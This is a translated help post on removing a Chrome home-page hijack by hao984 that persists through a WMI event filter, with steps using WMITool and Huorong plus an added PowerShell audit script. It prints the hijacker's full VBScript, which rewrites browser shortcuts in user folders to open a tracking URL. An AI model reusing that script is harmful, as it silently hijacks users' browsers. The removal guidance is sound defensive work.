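Probably because of some software I installed recently, Chrome's home page was hijacked and changed to hao984. The usual methods could not fix it; people really do rack their brains to pull off tricks like this.
The techniques keep going deeper, and without dedicated tools the problem really cannot be solved.
The steps to fix it are as follows:
Step 1: Delete the entry with WMITool
After installing, open WMI event viewer (download: https://www.pc18.com/soft/15730.html), click "register for events" in the upper-left corner, enter "root\CIMV2" in the "Connect to namespace" dialog that pops up, and confirm.
Select the entry under "_EventFilter" on the left, right-click it, and delete it.
You can also choose "view instant properties" to see the exact content of the code being invoked: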
On Error Resume Next:Const link = "http://hao984.com/?r=xlpjgstdnmxx&m=v1":Const link360 = "http://hao984.com/?r=xlpjgstdnmxx&m=v1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
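Step 2: Clean up with the Huorong malicious trojan removal tool (this is critical)
Huorong malicious trojan removal tool update, which handles home page hijacking and similar viruses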
http://bbs.huorong.cn/thread-18575-1-1.html
http://huorong.cn/person5.html
C:\Windows\guardapi.dll
C:\Windows\hnbjwxlsr.sys
Finally, restart the computer and the problem is solved.
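The result of the steps above can be cross-checked from PowerShell. The following is an added example, not part of the original post: it lists WMI event filters, script and command-line consumers, and bindings in root\CIMV2 and root\subscription, then reports shortcuts whose arguments are a bare URL, which is what the script shown above writes. The $Fix switch, the folder list and the URL pattern are assumptions of this example.

```powershell
# Added example (not from the original post). Run in an elevated PowerShell session.
$Fix = $false   # assumption: set to $true only after reviewing the report below

# 1) List permanent WMI event subscriptions. root\CIMV2 is the namespace used on
#    this page; root\subscription is the usual default location.
$namespaces = 'root\CIMV2', 'root\subscription'
$classes    = '__EventFilter', 'ActiveScriptEventConsumer',
              'CommandLineEventConsumer', '__FilterToConsumerBinding'
$subscriptions = foreach ($ns in $namespaces) {
    foreach ($cls in $classes) {
        # A consumer class may not be registered in a namespace; skip that error.
        Get-CimInstance -Namespace $ns -ClassName $cls -ErrorAction SilentlyContinue |
            ForEach-Object {
                $detail = $_.Query, $_.ScriptText, $_.CommandLineTemplate, $_.Filter |
                    Where-Object { $_ }
                [pscustomobject]@{ Namespace = $ns; Class = $cls; Name = $_.Name
                                   Detail = $detail -join ' | ' }
            }
    }
}
$subscriptions | Format-List
# After review, a confirmed-bad instance can be piped to Remove-CimInstance.

# 2) Find shortcuts whose arguments are a bare URL. Arguments such as
#    --app=https://... do not match, so browser app shortcuts are left alone.
$shell   = New-Object -ComObject WScript.Shell
$folders = "$env:PUBLIC\Desktop", "$env:USERPROFILE\Desktop",
           "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
           "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
           "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch"
$hits = Get-ChildItem -Path $folders -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        $old = $lnk.Arguments
        if ($old -match '^\s*"?https?://') {
            # Clearing the arguments restores a plain browser launch.
            if ($Fix) { $lnk.Arguments = ''; $lnk.Save() }
            [pscustomobject]@{ Shortcut = $_.FullName; Target = $lnk.TargetPath
                               Arguments = $old; Cleared = [bool]$Fix }
        }
    }
$hits | Format-List
```

A default Windows installation normally has an "SCM Event Log Filter" in root\subscription, so an entry is not malicious merely because it exists; read the Query and ScriptText values before deleting anything.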
Related articles:
Using WMITool to fix the browser home page being hijacked by hao123
http://www.rootop.org/pages/3741.html
https://www.cnblogs.com/yiven/p/9290140.html